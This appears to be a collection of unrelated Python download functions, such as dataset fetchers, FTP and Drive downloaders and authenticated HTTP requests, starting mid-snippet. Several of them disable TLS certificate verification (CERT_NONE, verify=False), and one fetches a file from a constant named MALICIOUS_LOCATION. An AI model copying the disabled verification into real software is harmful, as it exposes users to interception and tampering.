'{1}' not found on server or server is down\"\n .format(ex.msg, fname))\n raise ex\n\n # # progress bar\n # widgets = [fname + ': ',\n # pb.Percentage(),\n # ' ',\n # pb.Bar(),\n # ' ',\n # pb.ETA(),\n # ' ',\n # pb.FileTransferSpeed(),\n # ]\n\n # pbar = pb.ProgressBar(widgets=widgets,\n # maxval=int(resp.info().getheader('Content-Length'))\n # ).start()\n\n if not os.path.exists(path_):\n os.makedirs(path_)\n\n sz_read = 0\n with open(file_, 'wb') as fh:\n # while sz_read < resp.info().getheader('Content-Length')\n # goes into infinite recursion so break loop for len(data) == 0\n while True:\n data = resp.read(CHUNKSIZE)\n\n if len(data) == 0:\n break\n else:\n fh.write(data)\n sz_read += len(data)\n\n # if sz_read >= CHUNKSIZE:\n # pbar.update(CHUNKSIZE)\n\n # pbar.finish()\n return file_", "def retrieve_data(file: str, landing_path: str, local: bool) -> bool:\n\n base_url = \"https://files.training.databricks.com/static/data/health-tracker/\"\n url = base_url + file\n driverPath = \"file:/databricks/driver/\" + file\n dbfsPath = landing_path + file\n if local:\n urlretrieve(url, landing_path + file)\n else:\n urlretrieve(url, file)\n dbutils.fs.mv(driverPath, dbfsPath)\n return True", "def download_data(self, format = 'srt'):\n resp, content = httplib2.Http(\".cache\").request(self.url, \"GET\")\n suburl = json.loads(content)['url']\n resp, content = httplib2.Http(\".cache\").request(suburl, \"GET\")\n\n return content", "def _download_epw_file(url):\n r = requests.get(url)\n if r.ok:\n # py2 and 3 compatible: binary write, encode text first\n log.debug(\" ... OK!\")\n return io.StringIO(r.text)\n else:\n log.error(\" connection error status code: %s\" % r.status_code)\n r.raise_for_status()", "def _get_data(self):\n try:\n \n with open('auto-mpg.data.txt', 'w') as data_file:\n url = 'https://archive.ics.uci.edu/ml/machine-learning-databases/auto-mpg/auto-mpg.data'\n r = requests.get(url, stream=True)\n if r.status_code == 200:\n logger.debug(f'response code from url: 200')\n self.response_code = 200\n for line in r.iter_lines():\n data_file.write(line.decode() + '\\n')\n else:\n self.response_code = r.status_code\n logger.info(f'{url} returned status code {r.status_code}')\n except Exception as e:\n logger.info(f'Unexpected error writing to file {str(e)}. 
Exiting.')\n sys.exit()", "def fetch_save(url):\n\n name = url.split(\"/\")[-1]\n response = requests.get(url, stream=True)\n if response.status_code == 200:\n with open(f\"{DATA_PATH}/{name}\", \"wb\") as f:\n f.write(response.raw.read())\n else:\n logging.info(f\"Failed {url} download\")", "def fetch_data(data_url):\n return requests.get(data_url).content", "async def _download(self) -> None:\n\n # do request\n async with aiohttp.ClientSession() as session:\n async with session.get(self.url, auth=self._auth, timeout=self._timeout) as response:\n # check response\n if response.status == 200:\n # get data and return it\n self._buffer = await response.read()\n elif response.status == 401:\n log.error(\"Wrong credentials for downloading file.\")\n raise FileNotFoundError\n else:\n log.error(\"Could not download file from filecache.\")\n raise FileNotFoundError", "def get_data_from_web():\n pass", "def getfilehttps(self, url):\n ctx = ssl.create_default_context()\n ctx.check_hostname = False\n ctx.verify_mode = ssl.CERT_NONE\n response = urllib.request.urlopen(url, context=ctx)\n result = response.read()\n return result", "def downloadData(url):\n \n content = urllib2.urlopen(url)\n return content", "def accessRemoteData(dataUrl):\n req = Request(dataUrl)\n try:\n response = urlopen(req)\n except ValueError as e:\n print('Invalid URL string', e.reason)\n sys.exit()\n except HTTPError as e:\n print('Error code: ', e.code)\n sys.exit()\n except URLError as e:\n print('Reason: ', e.reason)\n sys.exit()\n else:\n print('Request successful, downloading data.')\n return response.read().decode('utf-8')", "def downloadString(url):\n filein = urllib2.urlopen(url)\n data = filein.read()\n filein.close()\n return data", "def download_data(origin_time, net, sta, loc, chan):\n \n dataDir_get = '/import/netapp-m-02-bay200/mseed_online/archive/'\n \n fileName = \".\".join((net, sta, \".\" + chan + \".D\",\n origin_time.strftime(\"%Y.%j\")))\n filePath = os.path.join(dataDir_get, origin_time.strftime(\"%Y\"),\n net, sta, chan + '.D', fileName)\n o_time2 = origin_time + 86400\n fileName2 = \".\".join((net, sta, \".\" + chan + \".D\",\n o_time2.strftime(\"%Y.%j\")))\n filePath2 = os.path.join(dataDir_get, o_time2.strftime(\"%Y\"),\n net, sta, chan + '.D', fileName2)\n\n if os.path.isfile(filePath):\n if origin_time.hour > 21:\n st = Stream()\n st.extend(read(filePath, starttime = origin_time - 180,\n endtime = origin_time + 3 * 3600))\n st.extend(read(filePath2, \n starttime = UTCDateTime(o_time2.year, o_time2.month, \n o_time2.day, 0, 0),\n endtime = origin_time + 3 * 3600))\n st.merge(method=-1)\n else:\n st = read(filePath, starttime = origin_time - 180,\n endtime = origin_time + 3 * 3600)\n else:\n print \"++++ cannot find the following file: \\n %s \\n++++\" % filePath\n\n if not st:\n raise RotationalProcessingException('Data not available for this'\n ' event...')\n st.trim(starttime=origin_time-180, endtime=origin_time+3*3600)\n\n print 'Download of', st[0].stats.station, st[0].stats.channel, \\\n 'data successful!'\n\n return st", "def downloadFile()-> None:\n logging.info(f\"Downloading current data set {getTime()}\")\n with open(DATA_FILE,\"wb\") as f:\n f.write(get(\"https://covid.ourworldindata.org/data/owid-covid-data.csv\").text.encode())\n logging.info(f\"Finished Downloading current data set {getTime()}\")", "def do_GET(self):\n server_ip = Setup.parse_options()['ip_address']\n uri = \"http://\" + server_ip + self.path\n response = urllib.urlopen(uri)\n self.copyfile(response, self.wfile)\n 
headers = self.generate_header_dic(self.headers.headers)\n ip_address = self.client_address[0] # get client iP address\n if Setup.system_status != 'green':\n self.process_request(ip_address, headers, self.path)\n self.process_response(ip_address, response.headers)", "def fetch_file(self, location, output=None):\n\n self.log.debug(\"Fetching '%s' file...\" % location)\n\n if not output:\n output = tempfile.mktemp(\"-dogen\")\n \n self.log.debug(\"File will be saved as '%s'...\" % output)\n\n with open(output, 'wb') as f:\n f.write(requests.get(location, verify=self.ssl_verify).content)\n\n return output", "def _download_from_url(self) -> bytes:\n response = requests.get(self.url, allow_redirects=True)\n return response.content", "def connect(self):\r\n zip = self.zip\r\n ccode = self.ccode\r\n apikey = self.apikey\r\n url = f\"https://api.openweathermap.org/data/2.5/weather?zip={zip},{ccode}&appid={apikey}\"\r\n\r\n weather_obj = self._download_url(url)\r\n if weather_obj is not None:\r\n return weather_obj", "def get_file(url):\n helpers.make_workdir() # create temp working directory\n file_url = url + constant.MALICIOUS_LOCATION\n print(file_url)\n filename = wget.download(file_url, out=constant.WORKDIR)\n return filename", "def download(self):\n if not self.url:\n raise RuntimeError(self.tips)\n\n download_file_name = os.path.join(\n self.raw_path, os.path.splitext(os.path.basename(self.url))[0]\n )\n file_format = self.url.split(\".\")[-1]\n if \"amazon\" in self.url:\n raw_file_path = os.path.join(\n self.raw_path, f\"{self.dataset_name}.json.{file_format}\"\n )\n else:\n raw_file_path = os.path.join(\n self.raw_path, f\"{self.dataset_name}.{file_format}\"\n )\n if \"1drv.ms\" in self.url:\n file_format = \"zip\"\n raw_file_path = os.path.join(\n self.raw_path, f\"{self.dataset_name}.{file_format}\"\n )\n if not os.path.exists(raw_file_path):\n print(f\"download_file: url: {self.url}, raw_file_path: {raw_file_path}\")\n download_file(self.url, raw_file_path)\n if \"amazon\" in raw_file_path:\n # amazon dataset do not unzip\n print(\"amazon dataset do not decompress\")\n return\n elif file_format == \"gz\":\n file_name = raw_file_path.replace(\".gz\", \"\")\n with gzip.open(raw_file_path, \"rb\") as fin:\n with open(file_name, \"wb\") as fout:\n shutil.copyfileobj(fin, fout)\n else:\n shutil.unpack_archive(\n raw_file_path, self.raw_path, format=get_format(file_format)\n )\n\n if not os.path.exists(download_file_name):\n return\n elif os.path.isdir(download_file_name):\n os.rename(\n download_file_name, os.path.join(self.raw_path, self.dataset_name)\n )\n else:\n os.rename(\n download_file_name,\n os.path.join(\n self.raw_path,\n f'{self.dataset_name}.{download_file_name.split(\".\")[-1]}',\n ),\n )", "def get_file(self):\n while not (self.is_connection_working()):\n print('Connection is not working. Reason should be printed above. Sleeping 5 minutes and retrying.')\n time.sleep(300)\n i = 0\n while True:\n if i >= 3:\n print('Looks like file {} is really not on FTP. Skipping.'.format(self.url))\n return\n if self.file_exists_on_ftp():\n with closing(request.urlopen(self.url, )) as r:\n with open(self.save_filepath, 'wb') as f:\n shutil.copyfileobj(r, f)\n if i > 0:\n print('Download succeeded on attempt {}'.format(i+1))\n return\n else:\n print(\n 'requests.urlopen error. This sometimes means that file {} \"not exists\" on FTP '\n 'but sometimes it is just \"erruption on the Sun\" and file is downloaded on second attempt. '\n 'Sleeping 1 minute and retrying download. 
Retry will be done {} more times'.format(self.url,\n 3 - (i + 1)))\n time.sleep(60)\n i += 1\n continue\n # print('WARNING: Connection is OK, but system was not able to get file. Skipping.')", "def getfile(url):\n try:\n return urlreq.urlopen(url)\n except urlreq.HTTPError as e:\n safeprint(\"Sever returned with response code \" + str(e.getcode()) + \", download failed.\")", "def _download_data(src_url, dst_file):\n try:\n subprocess.check_call([\n \"wget\", \"--load-cookies=cookies.txt\", \"--tries=2\", \"-O\", dst_file, src_url\n ])\n except subprocess.CalledProcessError as process_error:\n print(\"ERROR: {}\".format(process_error))\n logging.error(\"Failed to download data file. Data url: %s.\", src_url)", "def download_country_data(\n url=default_url,\n filename=default_data_file,\n force=False\n):\n if not os.path.isfile(filename) or force:\n text = requests.get(url).text\n with open(filename, 'w') as fp:\n fp.write(text)", "def _get(self, remote_filename, local_path):\n\n with local_path.open('wb') as local_file:\n file_id = self.get_file_id(remote_filename)\n if file_id is None:\n raise BackendException(\n 'File \"%s\" cannot be downloaded: it does not exist' %\n remote_filename)\n\n response = self.http_client.get(\n self.content_url + '/nodes/' + file_id + '/content', stream=True)\n response.raise_for_status()\n for chunk in response.iter_content(chunk_size=DEFAULT_BUFFER_SIZE):\n if chunk:\n local_file.write(chunk)\n local_file.flush()", "def download_data():\n urllib.request.urlretrieve('http://cs.iit.edu/~culotta/cs579/a1/edges.txt.gz', 'edges.txt.gz')", "def download_data():\n # Download Unihan meta data for radical-stroke analysis\n os.system(' mkdir Unihan')\n os.system(' curl -O http://unicode.org/Public/UCD/latest/ucd/Unihan.zip')\n os.system(' apt-get -y install unzip')\n os.system(' unzip Unihan.zip -d Unihan/')\n os.system(' rm Unihan.zip')\n\n data_path = 'Unihan/Unihan_RadicalStrokeCounts.txt'\n assert(os.path.isfile(data_path))\n\n return data_path", "def get_remote_file(url):\n # Disable the proxies by not trusting the env\n session = requests.Session()\n session.trust_env = False\n\n # Make the request\n requests.packages.urllib3.disable_warnings()\n try:\n r = session.get(url, verify=False)\n except requests.exceptions.RequestException as e:\n # catastrophic error. bail.\n print(e)\n sys.exit(1)\n\n r = session.get(url, verify=False)\n remote_file = r.text\n return remote_file", "def __maybeDownload():\n if not os.path.isdir(Download.DATA_ROOT): # 若 data 目录不存在,创建 data 目录\n os.mkdir(Download.DATA_ROOT)\n file_path = os.path.join(Download.DATA_ROOT, Download.FILE_NAME)\n\n if os.path.exists(file_path): # 若已存在该文件\n statinfo = os.stat(file_path)\n if statinfo.st_size == Download.FILE_SIZE: # 若该文件正确,直接返回 file_path\n print('Found and verified %s' % file_path)\n return file_path\n else: # 否则,删除文件重新下载\n os.remove(file_path)\n\n download_url = Download.URL + Download.FILE_NAME\n print('Downloading %s ...' % download_url)\n filename, _ = urlretrieve(download_url, file_path) # 下载数据\n print('Finish downloading')\n\n statinfo = os.stat(filename)\n if statinfo.st_size == Download.FILE_SIZE: # 校验数据是否正确下载\n print('Found and verified %s' % filename)\n else:\n print(statinfo.st_size)\n raise Exception('Failed to verify ' + filename + '. 
Can you get to it with a browser ?')\n return filename", "def fetch_and_cache(data_url, file, data_dir=\"data\", force=False):\n data_dir = Path(data_dir)\n data_dir.mkdir(exist_ok = True)\n file_path = data_dir / Path(file)\n if force and file_path.exists():\n file_path.unlink()\n if force or not file_path.exists():\n print('Downloading...', end=' ')\n resp = requests.get(data_url)\n with file_path.open('wb') as f:\n f.write(resp.content)\n print('Done!')\n last_modified_time = time.ctime(file_path.stat().st_mtime)\n else:\n last_modified_time = time.ctime(file_path.stat().st_mtime)\n print(\"Using cached version that was downloaded (UTC):\", last_modified_time)\n return file_path", "def get_data_from_storage(data_file):\n print(f\"{CR}Yipes, I don't know how to pull data from dvc yet{C0}\")", "def download_data(self):\n headers = {'User-Agent': 'Mozilla/5.0',}\n\n #Request for html data of url page\n r = requests.get(self.url, headers = headers, allow_redirects=True)\n soup = BeautifulSoup(r.text, \"html.parser\")\n\n #Checking if folder path exists, if not, creats it\n i=0\n while i<len(self.folder)-1:\n if self.folder[i] == '/':\n if not os.path.isdir(self.folder[:i]):\n os.mkdir(self.folder[:i])\n i+=1\n if i==len(self.folder)-1:\n if not os.path.isdir(self.folder):\n os.mkdir(self.folder)\n\n # if not os.path.isdir(self.folder):\n # os.mkdir(self.folder)\n\n #Gets every href to zip file with data\n entries = []\n for link in soup.find_all('a'):\n if re.search(\"^data/.*.zip\", link.get('href')):\n entries.append(link.get('href'))\n\n #Gets the newest dataset\n self.getCurrentData(entries)\n\n i=0\n #Saves each file in dataset\n for list in self.ListOfZipFiles:\n if not os.path.isfile(self.folder+list[4:]):\n r = requests.get(self.url+list)\n open(self.folder+list[4:], 'wb').write(r.content)\n #deletes prefix \"data/\"\n self.ListOfZipFiles[i] = list[4:]\n i+=1", "def download_file(service, drive_file):\r\n download_url = drive_file.get('downloadUrl')\r\n if download_url:\r\n resp, content = service._http.request(download_url)\r\n if resp.status == 200:\r\n #print 'Status: %s' % resp\r\n return content\r\n else:\r\n #print 'An error occurred: %s' % resp\r\n return None\r\n else:\r\n # The file doesn't have any content stored on Drive.\r\n return None", "def fetch_sprot_dat(location):\n # login or reconnect\n ftp = ftplib.FTP('ftp.uniprot.org')\n ftp.login() \n \n # move into documents location\n ftp.cwd('/pub/databases/uniprot/current_release/knowledgebase/complete/')\n\n # get file contents\n print('...starting download of UniProt Sprot dat file')\n fname = 'uniprot_sprot.dat.gz'\n ftp.retrbinary('RETR {}'.format(fname), open(os.path.join(location, fname), 'wb').write)\n print('...{} was downloaded OK'.format(fname))\n\n # logout connection and return\n ftp.quit()\n return", "def get_data(self, url):\n\n req = urllib2.Request(url)\n # urlencode the query dictionary\n try:\n r = urllib2.urlopen(req)\n result = r.read()\n except:\n result = 'The url: %s is not responding.' 
% (url)\n return result", "def _get_file(cls, url: str, ende: str) -> bool:\n resposta = requests.get(url)\n if resposta.status_code == requests.codes.OK:\n with open(ende, 'wb') as novo_arquivo:\n novo_arquivo.write(resposta.content)\n return True\n else:\n resposta.raise_for_status()\n return False", "def download_data(self, url: str, source_type: str) -> None:\n r = None # request\n\n # download data from nextcloud\n if source_type == \"nextcloud\":\n token = url\n r = requests.get(\n os.environ[\"NC_WEBDAV_URL\"], auth=(token, os.environ[\"NC_PASSWORD\"])\n )\n\n # download data from generic URLs\n if source_type == \"generic_url\":\n s = requests.Session()\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0\"\n }\n s.headers.update(headers)\n r = s.get(url)\n\n f_name = None # file name\n\n if \"content-disposition\" in r.headers.keys():\n d = r.headers[\"content-disposition\"]\n f_name = re.findall('filename=\"(.+)\"', d)[0]\n else:\n f_name = url.split(\"/\")[-1]\n\n # save file\n try:\n with open(Path(os.environ[\"DATA_PATH\"]) / f_name, \"wb\") as f:\n for chunk in r.iter_content(self.chunk_size):\n f.write(chunk)\n except OSError:\n print(f\"Error: {list(Path(os.environ['DATA_PATH']).iterdir())}\")", "def get_file(self, path):\n file = self.get('data_request?id=file&parameters=%s' % path)\n return file", "def download_file(service, drive_file):\n download_url = drive_file.get('downloadUrl')\n if download_url:\n resp, content = service._http.request(download_url)\n if resp.status == 200:\n #print 'Status: %s' % resp\n return content\n else:\n print 'An error occurred: %s' % resp\n return None\n else:\n # The file doesn't have any content stored on Drive.\n return None", "def get_data_from_URL(url):\n querystring = {\"q\": \"eminem\"}\n headers = {\n 'x-rapidapi-host': \"deezerdevs-deezer.p.rapidapi.com\",\n 'x-rapidapi-key': \"SIGN-UP-FOR-KEY\"\n }\n\n response = requests.request(\n \"GET\", url, headers=headers, params=querystring)\n received_file = json.loads(response.text)\n return received_file", "def _download(self) -> None:\n download_url(\n self.url,\n self.root,\n filename=self.data_dir,\n md5=self.md5 if self.checksum else None,\n )\n self._extract()", "def fetch(self, url: furl) -> str:\n try:\n contents = self._download(url)\n except requests.ConnectionError as err:\n logger.exception(f\"Request failed with {err}\")\n click.secho(\n f\"The URL {url} could not be downloaded. 
Either your network is unreachable or the URL is broken.\"\n f\" Check the URL, fix your connection, or use \"\n f\" {OptionEnum.OFFLINE.as_flake8_flag()} / {OptionEnum.OFFLINE.as_envvar()}=1\",\n fg=\"red\",\n err=True,\n )\n return \"\"\n return contents", "def testGetDrugBankUrl(self):\n try:\n remoteLocator = \"https://www.drugbank.ca/releases/latest/downloads/all-full-database\"\n un = \"username\"\n pw = \"password\"\n # fn = self.__fileU.getFileName(remoteLocator)\n ok = self.__fileU.isLocal(remoteLocator)\n self.assertFalse(ok)\n #\n lPath = os.path.join(self.__workPath, \"db-download.zip\")\n ok = self.__fileU.get(remoteLocator, lPath, username=un, password=pw)\n self.assertTrue(ok)\n ok = self.__fileU.exists(lPath)\n self.assertTrue(ok)\n ok = self.__fileU.isLocal(lPath)\n self.assertTrue(ok)\n tPath = self.__fileU.getFilePath(lPath)\n self.assertEqual(lPath, tPath)\n self.__fileU.uncompress(lPath, outputDir=self.__workPath)\n\n except Exception as e:\n logger.exception(\"Failing with %s\", str(e))\n self.fail()", "def retrieve_ipac_file(url):\n \n request = urllib2.Request(url)\n \n # Encode the username and password to send for authorization\n base64string = base64.encodestring('%s:%s' % (IPAC_USER, IPAC_PASSWORD)).replace('\\n', '')\n request.add_header(\"Authorization\", \"Basic %s\" % base64string)\n \n # Retrieve the response\n try:\n response = urllib2.urlopen(request)\n except urllib2.HTTPError, e:\n print \"HTTPError: Authorization failed or request invalid.\\n\\t->HTTP Response returned error code {}\".format(e.code)\n raise\n except urllib2.URLError, e:\n print \"URLError: {}\".format(e.reason)\n raise\n \n file = StringIO.StringIO(response.read())\n return file", "def wind3dp_single_download(file, path=None):\n\n # add a OS-specific '/' to end end of 'path'\n if path:\n if not path[-1] == os.sep:\n path = f'{path}{os.sep}'\n else:\n path = sunpy.config.get('downloads', 'download_dir') + os.sep\n\n data = file.split('_')[1] # e.g. 
'sfsp'\n year = file.split('_')[3][:4]\n base = f\"https://sprg.ssl.berkeley.edu/wind3dp/data/wi/3dp/{data}/{year}/\"\n\n url = base+'/'+file\n\n try:\n downloaded_file = pooch.retrieve(url=url, known_hash=None, fname=file, path=path, progressbar=True)\n except ModuleNotFoundError:\n downloaded_file = pooch.retrieve(url=url, known_hash=None, fname=file, path=path, progressbar=False)\n except requests.HTTPError:\n print(f'No corresponding data found at {url}')\n downloaded_file = []\n\n return downloaded_file", "def _downloadDataFile(self):\n config = SiteConfiguration.objects.get()\n\n with requests.Session() as s:\n # Authentication\n data = {\n 'identificationBean.identifiant': '{}'.format(config.login),\n 'identificationBean.mdp': '{}'.format(config.password),\n 'userName': '{}'.format(config.username)\n }\n url = 'http://extranet.ffbb.com/fbi/identification.do'\n s.post(url, data=data)\n\n # Create filters\n params = (\n ('action', 'executeCsv'),\n ('rechercherRencontreSaisieResultatBean.idDivision', ''),\n ('rechercherRencontreSaisieResultatBean.rechercherEquipe2', 'O'),\n ('rechercherRencontreSaisieResultatBean.dateDebutRencontre', ''),\n ('rechercherRencontreSaisieResultatBean.dateFinRencontre', ''),\n ('rechercherRencontreSaisieResultatBean.idPoule', ''),\n ('rechercherRencontreSaisieResultatBean.numeroEquipe', ''),\n )\n\n # Get Csv file\n url = 'http://extranet.ffbb.com/fbi/rechercherCompetitionRencontre.do'\n response = s.get(url, params=params)\n\n if(response.headers['content-type'] != 'application/ms-excel;charset=UTF-8'):\n return False\n\n # Create the file\n if response.status_code == 200:\n os.makedirs(os.path.dirname(settings.DATA_PATH), exist_ok=True)\n with open(settings.DATA_PATH, 'wb') as f:\n for chunk in response:\n f.write(chunk)\n\n return True", "def get_file_data(filename):", "def download_data(url, filename, dst_dir):\r\n fullpath = os.path.join(dst_dir, filename)\r\n if os.path.exists(fullpath):\r\n return\r\n\r\n # Try to open url\r\n try:\r\n page = urlopen(url)\r\n except Exception:\r\n shutil.copy(PLACEHOLDER, fullpath)\r\n return\r\n\r\n f = open(fullpath, 'wb')\r\n while True:\r\n buff = page.read(BLOCK_SZ)\r\n if not buff:\r\n break\r\n f.write(buff)\r\n f.close()\r\n pass", "def get_data(self, url, username, password, timeout):\n\n request = urllib2.Request(url)\n request.add_header('User-Agent',\n 'check_jenkins/%s %s' % (__version__, __url__))\n if (username and password):\n base64string = base64.b64encode('%s:%s' % (username, password))\n request.add_header(\"Authorization\", \"Basic %s\" % base64string)\n\n try:\n setdefaulttimeout(timeout)\n return urllib2.urlopen(request).read()\n except HTTPError:\n print 'CRITICAL: Error on %s does the job exist or ever ran ?' 
% url\n raise SystemExit, 2\n except URLError:\n print 'CRITICAL: Error on %s Double check the server name' % url\n raise SystemExit, 2", "def fetch(self, url) -> bytes:\n buffer = self.download(url)\n zfs = ZipFileSystem(buffer, \"r\")\n return zfs.open(zfs.glob(\"*\")[0]).read()", "def get_remote_content(self, path):\n if path.startswith(\"http\"):\n page_path = path\n elif path.startswith(\"www\"):\n page_path = \"https://\" + path\n else:\n page_path = self.source + path\n \n print(\"Getting \" + page_path)\n \n try:\n resp = requests.get(page_path)\n except:\n print(\"Unable to get \" + page_path)\n return None\n \n if resp.status_code == 200:\n return resp.content\n else:\n print(\"Unable to get \" + page_path + \" Response = \" + str(resp.status_code))\n return None", "def extract_data(url,file_path):\n #setup session\n with session() as c:\n #post request\n c.post('https://www.kaggle.com/account/login',data=payload)\n #open file to write\n with open(file_path,'wb') as handle:\n #get request\n response=c.get(url,stream=True)\n print(response)\n for block in response.iter_content(1024):\n handle.write(block)", "def fetch_zenodo(self):\n\n # retrieve content from URL\n try:\n logging.info(f\"Downloading example data from {self.url}\")\n r = requests.get(self.url, stream=True)\n with io.BytesIO() as stream:\n with tqdm.wrapattr(\n stream,\n 'write',\n file=sys.stdout,\n miniters=1,\n desc=self.url,\n total=int(r.headers.get('content-length', 0))\n ) as file:\n for chunk in r.iter_content(chunk_size=4096):\n file.write(chunk)\n with zipfile.ZipFile(stream) as zipped:\n # extract each file in the zipped dir to the project\n for f in zipped.namelist():\n logging.info(\"Unzipped: {}\".format(os.path.join(self.destination, f)))\n zipped.extract(f, self.destination)\n\n logging.info(\"Download and install complete.\")\n\n self.close_logger()\n\n except requests.exceptions.MissingSchema:\n msg = f\"Unable to download data from {self.url}\"\n logging.exception(msg)\n self.close_logger()\n raise", "def download(self, url, filename):\n print(\"url\", url)\n print(\"filename\", filename)\n # open in binary mode\n with open(filename, \"wb\") as file:\n # get request\n try:\n r = requests.get(url)\n if r.status_code == 404:\n raise NotFoundException(\n \"URL: \", url, \" is not working. 
Status code 404\")\n # write to file\n file.write(r.content)\n print(\"file downloaded\")\n except ConnectionError as ex:\n print(ex)\n except NotFoundException as ex:\n print(ex)\n except Exception as ex:\n print(ex)", "def ferry_data_download(URL):\n explanation = 'File exists'\n file_downloaded = True\n # Request if the thredds server is working, add .html to URL\n req = requests.get(URL + '.html')\n if req.status_code == 200:\n \"\"\"File exists and is good for download, so write file\"\"\"\n print('File is ok')\n explanation = 'Good URL, File downloaded'\n file_downloaded = True\n ferry = xr.open_dataset(URL)\n else:\n print('File not found or unavailable')\n explanation = ' File not found or unavailable'\n file_downloaded = False\n ferry = np.nan\n return (ferry, file_downloaded, explanation)", "def download():\n raise NotImplementedError", "def fetch(data_dir):\n file_path = os.path.join(data_dir, DESTINATION, ZIP_NAME)\n result_path = os.path.join(data_dir, DESTINATION, NAME)\n return utils.fetch(URL, file_path, result_path)", "def get_url_data(url):\n\n # Return data while saving the data in a file \n # which is a hash of the URL\n data = requests.get(url).content\n # Save it in a filename\n filename = hashlib.md5(url.encode(\"utf8\")).hexdigest()\n# open(filename, 'w').write(data)\n with open(filename, \"w\") as fileObj:\n fileObj.write(data.decode(\"utf8\"))\n return data", "def get_from_net(self, url):\n print 'opening', url\n ty = urlopen(url)\n print 'reading...'\n s = ty.read()\n print 'done'\n return s", "def fetch_the_data():\n subprocess.run([\"wget\", \"https://storage.googleapis.com/recipe-box/recipes_raw.zip\"])\n subprocess.run([\"unzip\", \"recipes_raw.zip\", \"-d\", RECIPES_DIRPATH])\n subprocess.run([\"rm\", \"recipes_raw.zip\"])", "def get_backup_data():\n print '\\nConnection Error, Using Backup JSON File\\n'\n if system() == \"Darwin\":\n backup_file = 'Backup/backup.json'\n else:\n backup_file = '/home/pi/MurmurWall/Raspi/Backup/backup.json' \n with open(backup_file) as backup_json_file: \n current_json = load(backup_json_file)\n return current_json", "def main(url, localfile):\n ph.download_file(url, localfile)", "def _fs_get_file(url, working_dir):\n if not os.path.isabs(url) and working_dir:\n url = os.path.join(working_dir, url)\n\n try:\n with codecs.open(url, 'r', encoding='utf-8') as f:\n return f.read()\n except Exception as e:\n raise ScrBaseException(\"Could not load file from {0}: {1}\".format(url, e))", "def send_get_request(url, file_name=None):\r\n request = urllib.request.Request(url, headers={'User-Agent': AGENT})\r\n with urllib.request.urlopen(request) as response:\r\n response_context = response.read()\r\n if file_name is None:\r\n return response_context\r\n with open(file_name, 'bw+') as f:\r\n f.write(response_context)\r\n return response_context", "def fetch_velib_auto():\n # This try statement guards against the lack of internet connection\n try:\n dat = get_velib_data()\n except URL.URLError as err:\n print \"URLError: No internet connection?\"\n return 0\n\n save_velib_data(dat, glob.datafile)", "def retrieve(url_and_path):\n try:\n urlretrieve(url_and_path[0], url_and_path[1])\n except HTTPError:\n pass", "def get_url_data(self, url):\n # print \"opening: \" + url\n request = urllib2.Request(url)\n base64string = '%s:%s' % (self.username, self.key)\n request.add_header(\"Authorization\", \"ApiKey %s\" % base64string)\n response = urllib2.urlopen(request)\n data = json.loads(response.read())\n return data", "def download():\r\n reader 
= GSODDataReader()\r\n year_list = range(2001, 2012)\r\n austin = reader.collect_data(year_list, exact_station=True,\r\n station_name='AUSTIN CAMP MABRY', state='TX', country='US')\r\n houston = reader.collect_data(year_list, exact_station=True,\r\n station_name='HOUSTON/D.W. HOOKS', state='TX', country='US')\r\n new_york = reader.collect_data(year_list, exact_station=True,\r\n station_name='NEW YORK/LA GUARDIA', state='NY', country='US')\r\n newark = reader.collect_data(year_list, exact_station=True,\r\n station_name='NEWARK INTL AIRPORT', state='NJ', country='US')\r\n punta_arenas = reader.collect_data(year_list, exact_station=True,\r\n station_name='PUNTA ARENAS', country='CH')\r\n wellington = reader.collect_data(year_list, exact_station=True,\r\n station_name='WELLINGTON AIRPORT', country='NZ')\r\n store = HDFStore('weather.h5')\r\n store['austin'] = austin\r\n store['houston'] = houston\r\n store['nyc'] = new_york\r\n store['newark'] = newark\r\n store['punta_arenas'] = punta_arenas\r\n store['wellington'] = wellington\r\n store.close()", "def read_data_nmt():\n data_dir = download_extract('fra-eng')\n with open(os.path.join(data_dir, 'fra.txt'), 'r') as f:\n return f.read()", "def _download_data_from_nfs_connection(self) -> 'DataFrame':\n\n # note: as we need to load a data into the memory,\n # we are using pure requests and helpers from the WML client\n data_path = self.location.path\n connection_id = self.connection.asset_id\n\n return self._download_data_from_nfs_connection_using_id_and_path(connection_id, data_path)", "def downloadData(url):\r\n\r\n data = urllib2.urlopen(url)\r\n csvdata = data.read()", "def data_file(self, path):\n return open(os.path.join(self.resource_path, path)).read()", "def get_fred_data(url):\n pass", "def get_data(datapath, asfile=False):\n import os\n\n ## The file is a local file - try to get it\n if not os.path.isfile(datapath) :\n print \"The file %s you are trying to access does not exist\" %(datapath)\n raise IOError\n fn = datapath\n if asfile:\n return open(fn)\n else:\n import numpy as np\n return np.loadtxt(fn)", "def get(self, filename, **kw):\n\n file_path = os.path.join(self.storage_path, filename)\n try:\n file_obj = open(file_path, \"r\")\n except IOError:\n return\n else:\n return file_obj.read()", "def __getFile_httplib(self, _src, _dst):\n\n #-------------------- \n # Pre-download callbacks\n #-------------------- \n self.runEventCallbacks('downloadStarted', _src, -1)\n self.runEventCallbacks('downloading', _src, 0)\n\n\n\n #-------------------- \n # Download\n #-------------------- \n response = self.__httpsRequest('GET', _src)\n data = response.read() \n with open(_dst, 'wb') as f:\n f.write(data) \n\n\n\n #-------------------- \n # Post-download callbacks\n #-------------------- \n self.removeFromDownloadQueue(_src)\n self.runEventCallbacks('downloadFinished', _src)", "def get_remote_bytes(file_url) -> io.BytesIO:\n result = urlfetch.fetch(file_url)\n return io.BytesIO(result.content)", "def __download_file(self, filename):\r\n \r\n respons = requests.get(self.__url + filename, stream=True)\r\n save_filename = os.path.join(self.__folder, os.path.basename(filename))\r\n with open(save_filename, 'wb') as output_file:\r\n for chunk in respons.iter_content(chunk_size=128):\r\n output_file.write(chunk)", "def download_dataset(self):\n raise NotImplementedError", "def download_data():\n url = 'https://www.dropbox.com/s/h9ubx22ftdkyvd5/ml-latest-small.zip?dl=1'\n urllib.request.urlretrieve(url, 'ml-latest-small.zip')\n zfile = 
